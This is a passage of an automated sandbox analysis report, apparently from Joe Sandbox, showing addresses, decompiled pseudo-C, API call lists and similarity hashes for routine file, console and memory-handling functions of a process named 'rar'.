                                                                                                            0x7ff650b345bf
                                                                                                            0x7ff650b345c7
                                                                                                            0x7ff650b345cc
                                                                                                            0x7ff650b345d1
                                                                                                            0x7ff650b345d9
                                                                                                            0x7ff650b345e6
                                                                                                            0x7ff650b345eb
                                                                                                            0x7ff650b345f4
                                                                                                            0x7ff650b345fc
                                                                                                            0x7ff650b34602
                                                                                                            0x7ff650b3460a
                                                                                                            0x7ff650b34614
                                                                                                            0x7ff650b34623
                                                                                                            0x7ff650b34625
                                                                                                            0x7ff650b3462c
                                                                                                            0x7ff650b34635
                                                                                                            0x7ff650b3463f
                                                                                                            0x7ff650b34645
                                                                                                            0x7ff650b3464a
                                                                                                            0x7ff650b3464e
                                                                                                            0x7ff650b34653
                                                                                                            0x7ff650b34656
                                                                                                            0x7ff650b34664
                                                                                                            0x7ff650b34672
                                                                                                            0x7ff650b34678
                                                                                                            0x7ff650b34681
                                                                                                            0x7ff650b34687
                                                                                                            0x7ff650b34689
                                                                                                            0x7ff650b3468c
                                                                                                            0x7ff650b34698
                                                                                                            0x7ff650b3469e
                                                                                                            0x7ff650b346a0
                                                                                                            0x7ff650b346a6
                                                                                                            0x7ff650b346ab
                                                                                                            0x7ff650b346b0
                                                                                                            0x7ff650b346b5
                                                                                                            0x7ff650b346b7
                                                                                                            0x7ff650b346bc
                                                                                                            0x7ff650b346c0
                                                                                                            0x7ff650b346c3
                                                                                                            0x7ff650b346c5
                                                                                                            0x7ff650b346cd
                                                                                                            0x7ff650b346d0
                                                                                                            0x7ff650b346d3
                                                                                                            0x7ff650b34703
                                                                                                            0x7ff650b34711
                                                                                                            0x7ff650b34713
                                                                                                            0x7ff650b3471b
                                                                                                            0x7ff650b34726
                                                                                                            0x7ff650b3472e
                                                                                                            0x7ff650b34734
                                                                                                            0x7ff650b3473d
                                                                                                            0x7ff650b34747
                                                                                                            0x7ff650b34749
                                                                                                            0x7ff650b34753
                                                                                                            0x7ff650b34758
                                                                                                            0x7ff650b34760
                                                                                                            0x7ff650b34766
                                                                                                            0x7ff650b3476d
                                                                                                            0x7ff650b3476f
                                                                                                            0x7ff650b34776
                                                                                                            0x7ff650b3477a
                                                                                                            0x7ff650b34785
                                                                                                            0x7ff650b34787
                                                                                                            0x7ff650b34791
                                                                                                            0x7ff650b34795
                                                                                                            0x7ff650b3479b
                                                                                                            0x7ff650b347a4
                                                                                                            0x7ff650b347b6
                                                                                                            0x7ff650b347c3
                                                                                                            0x7ff650b347d7
                                                                                                            0x7ff650b347de
                                                                                                            0x7ff650b347e2
                                                                                                            0x7ff650b347f0
                                                                                                            0x7ff650b347f5
                                                                                                            0x7ff650b347fe
                                                                                                            0x7ff650b34804
                                                                                                            0x7ff650b34806
                                                                                                            0x7ff650b34809
                                                                                                            0x7ff650b34810
                                                                                                            0x7ff650b34818
                                                                                                            0x7ff650b3481e
                                                                                                            0x7ff650b34824
                                                                                                            0x7ff650b3482b
                                                                                                            0x7ff650b34833
                                                                                                            0x7ff650b34835
                                                                                                            0x7ff650b3483a
                                                                                                            0x7ff650b34844
                                                                                                            0x7ff650b3484a
                                                                                                            0x7ff650b3484c
                                                                                                            0x7ff650b34853
                                                                                                            0x7ff650b34870
                                                                                                            0x7ff650b34879
                                                                                                            0x7ff650b34882
                                                                                                            0x7ff650b34887
                                                                                                            0x7ff650b3488f
                                                                                                            0x7ff650b34897
                                                                                                            0x7ff650b34899
                                                                                                            0x7ff650b3489d
                                                                                                            0x7ff650b348a4
                                                                                                            0x7ff650b348aa
                                                                                                            0x7ff650b348b0
                                                                                                            0x7ff650b348b5
                                                                                                            0x7ff650b348bf
                                                                                                            0x7ff650b348c8
                                                                                                            0x7ff650b348d0
                                                                                                            0x7ff650b348db
                                                                                                            0x7ff650b348e6
                                                                                                            0x7ff650b34916

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharEnvironmentExpandStrings
                                                                                                            • String ID:
                                                                                                            • API String ID: 4052775200-0
                                                                                                            • Opcode ID: 11cc89bd944e49d15c4fac2e17d2e9312f1eba424862861e635f1ff5ba9a23e9
                                                                                                            • Instruction ID: b093d3cdf0d68736f5fe9bf2da4e14f25050dfe07f7bc29ce97055182fc5db05
                                                                                                            • Opcode Fuzzy Hash: 11cc89bd944e49d15c4fac2e17d2e9312f1eba424862861e635f1ff5ba9a23e9
                                                                                                            • Instruction Fuzzy Hash: DBE1C622E1868362EB609B2194801FD67A1FB5B790F684131DE4FA7BD9DF3EF8458701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B31E84 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B31E84(void* __rax, void* __rcx, void* __rdx, signed int _a8, char _a24, signed int _a4120) {
				signed int _v0;
				intOrPtr _v8;
				void* __rbx;
				void* _t34;
				void* _t42;
				signed long long _t63;
				signed long long _t64;
				signed long long _t65;
				void* _t79;
				void* _t80;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;

				_t34 = E00007FF67FF650B69CB0(0x1050, __rax, _t85, _t86);
				_t81 = _t80 - __rax;
				_t63 =  *0x50b978f0; // 0x27db226282f1
				_t64 = _t63 ^ _t80 - __rax;
				_a4120 = _t64;
				_t87 = __rdx;
				if ((r8b & 0x00000010) != 0) goto 0x50b31ec8;
				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x50b31ec8;
				goto 0x50b31ecd;
				 *((intOrPtr*)(__rcx + 0x24)) = r8d;
				E00007FF67FF650B450F8(_t34, __rdx, __rdx);
				if ( *_t64 == 0x2e) goto 0x50b31eea;
				if ( *_t64 != 0x20) goto 0x50b31ef6;
				if ((bpl & 0x00000020) != 0) goto 0x50b31ef6;
				_t65 = _t64 | 0xffffffff;
				goto 0x50b31f1e;
				_a8 = _a8 & 0x00000000;
				_v0 = _v0 & 0x00000000;
				r9d = 0;
				r8d = 1;
				_v8 = 2;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				 *(__rcx + 8) = _t65;
				if (_t65 != 0xffffffff) goto 0x50b31f6f;
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t65, __rcx, __rdx,  &_a24, _t83) == 0) goto 0x50b31f6f;
				_a8 = _a8 & 0x00000000;
				_v0 = _v0 & 0x00000000;
				r9d = 0;
				_v8 = 2;
				r8d = 1; // executed
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				 *(__rcx + 8) = _t65;
				 *(__rcx + 0x14) =  *(__rcx + 0x14) & 0x00000000;
				 *((char*)(__rcx + 0x20)) = 1;
				 *((char*)(__rcx + 0x19)) = 0;
				return E00007FF67FF650B69D10(E00007FF67FF650B5A390(__rcx + 0x3a, _t87, _t79) & 0xffffff00 |  *(__rcx + 8) != 0xffffffff, _t42, _a4120 ^ _t81);
			}

















                                                                                                            0x7ff650b31e90
                                                                                                            0x7ff650b31e95
                                                                                                            0x7ff650b31e98
                                                                                                            0x7ff650b31e9f
                                                                                                            0x7ff650b31ea2
                                                                                                            0x7ff650b31eb2
                                                                                                            0x7ff650b31ebc
                                                                                                            0x7ff650b31ec2
                                                                                                            0x7ff650b31ec6
                                                                                                            0x7ff650b31ecd
                                                                                                            0x7ff650b31ed9
                                                                                                            0x7ff650b31ee2
                                                                                                            0x7ff650b31ee8
                                                                                                            0x7ff650b31eee
                                                                                                            0x7ff650b31ef0
                                                                                                            0x7ff650b31ef4
                                                                                                            0x7ff650b31ef6
                                                                                                            0x7ff650b31f02
                                                                                                            0x7ff650b31f07
                                                                                                            0x7ff650b31f0a
                                                                                                            0x7ff650b31f0d
                                                                                                            0x7ff650b31f18
                                                                                                            0x7ff650b31f1e
                                                                                                            0x7ff650b31f2b
                                                                                                            0x7ff650b31f2d
                                                                                                            0x7ff650b31f3f
                                                                                                            0x7ff650b31f41
                                                                                                            0x7ff650b31f4d
                                                                                                            0x7ff650b31f57
                                                                                                            0x7ff650b31f5a
                                                                                                            0x7ff650b31f62
                                                                                                            0x7ff650b31f65
                                                                                                            0x7ff650b31f6b
                                                                                                            0x7ff650b31f6f
                                                                                                            0x7ff650b31f7a
                                                                                                            0x7ff650b31f81
                                                                                                            0x7ff650b31faf

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF650B27E30,?,?,?,00000000,?,00007FF650B27BC4), ref: 00007FF650B31F18
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF650B27E30,?,?,?,00000000,?,00007FF650B27BC4), ref: 00007FF650B31F65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ac974ad063f8fa92d923c6d06b88f81d4d61456190da8074fc3eb9ec5b2668d5
                                                                                                            • Instruction ID: b010e693f6863439fe4dc0b3fd30f823b38ea8eaec20d2781a0bd6b75b63b41f
                                                                                                            • Opcode Fuzzy Hash: ac974ad063f8fa92d923c6d06b88f81d4d61456190da8074fc3eb9ec5b2668d5
                                                                                                            • Instruction Fuzzy Hash: 04310533A1874397E7708B20E8843A936A0AB4A7B8F184334DE6D977C5DFBED4948740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B279E8 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E00007FF67FF650B279E8(void* __rax) {
				char _t3;
				char _t4;
				char _t5;
				void* _t12;
				void* _t26;
				void* _t30;

				E00007FF67FF650B72A80(1, __rax);
				setbuf(??, ??);
				E00007FF67FF650B72A80(2, __rax);
				setbuf(??, ??);
				_t3 = E00007FF67FF650B27AC4(__rax); // executed
				 *0x50b9996d = _t3; // executed
				_t4 = E00007FF67FF650B27AC4(__rax); // executed
				 *0x50b9996e = _t4; // executed
				_t5 = E00007FF67FF650B27AC4(__rax); // executed
				 *0x50b9996f = _t5;
				if ( *0x50b9996d != 0) goto 0x50b27a6b;
				E00007FF67FF650B72A80(1, __rax);
				E00007FF67FF650B72D90(_t12, E00007FF67FF650B72D0C(__rax, __rax), 0x20000, _t26, __rax, _t30);
				if ( *0x50b9996e != 0) goto 0x50b27a92;
				E00007FF67FF650B72A80(2, __rax);
				return E00007FF67FF650B72D90(_t12, E00007FF67FF650B72D0C(__rax, __rax), 0x20000, _t26, __rax, _t30);
			}









                                                                                                            0x7ff650b279f1
                                                                                                            0x7ff650b279fb
                                                                                                            0x7ff650b27a05
                                                                                                            0x7ff650b27a0f
                                                                                                            0x7ff650b27a19
                                                                                                            0x7ff650b27a23
                                                                                                            0x7ff650b27a29
                                                                                                            0x7ff650b27a33
                                                                                                            0x7ff650b27a39
                                                                                                            0x7ff650b27a45
                                                                                                            0x7ff650b27a4b
                                                                                                            0x7ff650b27a52
                                                                                                            0x7ff650b27a66
                                                                                                            0x7ff650b27a72
                                                                                                            0x7ff650b27a79
                                                                                                            0x7ff650b27a96

                                                                                                            APIs
                                                                                                            • setbuf.LIBCMT ref: 00007FF650B279FB
                                                                                                              • Part of subcall function 00007FF650B72D34: _invalid_parameter_noinfo.LIBCMT ref: 00007FF650B77F9B
                                                                                                            • setbuf.LIBCMT ref: 00007FF650B27A0F
                                                                                                              • Part of subcall function 00007FF650B27AC4: GetStdHandle.KERNEL32(?,?,?,00007FF650B27A1E), ref: 00007FF650B27ACA
                                                                                                              • Part of subcall function 00007FF650B27AC4: GetFileType.KERNELBASE(?,?,?,00007FF650B27A1E), ref: 00007FF650B27AD6
                                                                                                              • Part of subcall function 00007FF650B27AC4: GetConsoleMode.KERNELBASE(?,?,?,00007FF650B27A1E), ref: 00007FF650B27AE9
                                                                                                              • Part of subcall function 00007FF650B72D0C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF650B72D20
                                                                                                              • Part of subcall function 00007FF650B72D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF650B72E6C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                            • String ID:
                                                                                                            • API String ID: 4044681568-0
                                                                                                            • Opcode ID: b44b16c5626dc2e656662fe10c5f163a5de0ba28734fed3f54b83de686bdfd24
                                                                                                            • Instruction ID: 5987e334174056c9e31f9092240dab15948545992d251f99cdde8b903de28436
                                                                                                            • Opcode Fuzzy Hash: b44b16c5626dc2e656662fe10c5f163a5de0ba28734fed3f54b83de686bdfd24
                                                                                                            • Instruction Fuzzy Hash: 8B019500E0E18366FE69A3B968963B925968F93310F0C457CE16FBA3D3DC1EA5458355
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B334CC Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E00007FF67FF650B334CC(void* __rax, long long __rbx, void* __rcx, long long _a16, char _a24, signed int _a4120, void* _a4160) {
				long _t9;
				long _t11;
				void* _t16;
				signed long long _t21;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;

				_a16 = __rbx;
				E00007FF67FF650B69CB0(0x1030, __rax, _t36, _t37);
				_t21 =  *0x50b978f0; // 0x27db226282f1
				_a4120 = _t21 ^ _t32 - __rax;
				_t9 = GetFileAttributesW(??); // executed
				if (_t9 != 0xffffffff) goto 0x50b33525;
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t21 ^ _t32 - __rax, __rbx, __rcx,  &_a24, _t35) == 0) goto 0x50b33525;
				_t11 = GetFileAttributesW(??); // executed
				return E00007FF67FF650B69D10(_t11, _t16, _a4120 ^ _t32 - __rax);
			}











                                                                                                            0x7ff650b334cc
                                                                                                            0x7ff650b334d7
                                                                                                            0x7ff650b334df
                                                                                                            0x7ff650b334e9
                                                                                                            0x7ff650b334f4
                                                                                                            0x7ff650b334ff
                                                                                                            0x7ff650b33501
                                                                                                            0x7ff650b33516
                                                                                                            0x7ff650b3351d
                                                                                                            0x7ff650b33547

                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00007FF650B33465,?,?,?,?,?,?,?,?,00007FF650B44252,?,?,?,?,The system cannot find the file specified.), ref: 00007FF650B334F4
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF650B44252,?,?,?,?,The system cannot find the file specified.,00000800,00000000), ref: 00007FF650B3351D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 67cfd00aff4eda5a436311f2b6fb17dd5118edbe30067f576c91b913ce2012bf
                                                                                                            • Instruction ID: 187ad462435538dc1501d25921602bdae4e0a58ed6d943585ce7cbdad5f39819
                                                                                                            • Opcode Fuzzy Hash: 67cfd00aff4eda5a436311f2b6fb17dd5118edbe30067f576c91b913ce2012bf
                                                                                                            • Instruction Fuzzy Hash: 5DF0C221B18B8352E6A0AB24F4C53E963A4BF4E7D4F480530EADED7799CF6DD5848B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AD44 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E00007FF67FF650B5AD44(void* __rax, void* __rcx, char _a24, signed int _a4120) {
				struct HINSTANCE__* _t12;
				void* _t14;
				signed long long _t19;
				void* _t29;
				void* _t33;
				void* _t34;
				void* _t35;

				E00007FF67FF650B69CB0(0x1030, __rax, _t34, _t35);
				_t19 =  *0x50b978f0; // 0x27db226282f1
				_a4120 = _t19 ^ _t29 - __rax;
				if (GetSystemDirectoryW(??, ??) != 0) goto 0x50b5ad80;
				goto 0x50b5ada3;
				r9d = 0x800;
				E00007FF67FF650B449D0(_t14, GetSystemDirectoryW(??, ??), _t19 ^ _t29 - __rax,  &_a24, __rcx,  &_a24, _t33);
				_t12 = LoadLibraryW(??); // executed
				return E00007FF67FF650B69D10(_t12, _t14, _a4120 ^ _t29 - __rax);
			}










                                                                                                            0x7ff650b5ad4b
                                                                                                            0x7ff650b5ad53
                                                                                                            0x7ff650b5ad5d
                                                                                                            0x7ff650b5ad7a
                                                                                                            0x7ff650b5ad7e
                                                                                                            0x7ff650b5ad80
                                                                                                            0x7ff650b5ad93
                                                                                                            0x7ff650b5ad9d
                                                                                                            0x7ff650b5adbb

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1175261203-0
                                                                                                            • Opcode ID: 6693acba1ae2a96febab7da7bf64a853121db8338344144d694733a4535e7b1e
                                                                                                            • Instruction ID: f234999d9637a5de58ce6ee082bf353b289eeab264f524dd2b2beb554b150bbe
                                                                                                            • Opcode Fuzzy Hash: 6693acba1ae2a96febab7da7bf64a853121db8338344144d694733a4535e7b1e
                                                                                                            • Instruction Fuzzy Hash: 43F06862A2858365F6A0A710E8853E663A4FF997C4F440031E9CEE6799EE2DD244CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B3A0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF650B5B3F5,?,?,?,?,?,?,00000000,00000000,00007FF650B38C34), ref: 00007FF650B5B3A4
                                                                                                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF650B5B3B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                            • String ID:
                                                                                                            • API String ID: 1231390398-0
                                                                                                            • Opcode ID: 94ec97cbbb8fe925e0f9d346ac5567707e5dd0fda350aa8db049d166987daa10
                                                                                                            • Instruction ID: 60cd440b3598d166ec258dfc137e1d8bf7b680dd6c77a5e9e2022a3c99509feb
                                                                                                            • Opcode Fuzzy Hash: 94ec97cbbb8fe925e0f9d346ac5567707e5dd0fda350aa8db049d166987daa10
                                                                                                            • Instruction Fuzzy Hash: D7E02B61B2894792DF888F55C4809E973A1FFC9B40F888036E50BE3B24EE3DE5498700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7495C Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B7495C(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t4;
				void* _t10;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x50b74998;
				_t14 =  *0x50bb4430; // 0x1f9cbcb0000, executed
				_t1 = HeapFree(_t10, ??); // executed
				if (_t1 != 0) goto 0x50b74993;
				E00007FF67FF650B74DAC(__rax);
				_t4 = E00007FF67FF650B74CF4(GetLastError(), __rax, _t14, __rcx);
				 *__rax = _t4;
				return _t4;
			}







                                                                                                            0x7ff650b7495f
                                                                                                            0x7ff650b7496b
                                                                                                            0x7ff650b74972
                                                                                                            0x7ff650b7497a
                                                                                                            0x7ff650b7497c
                                                                                                            0x7ff650b7498c
                                                                                                            0x7ff650b74991
                                                                                                            0x7ff650b74998

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
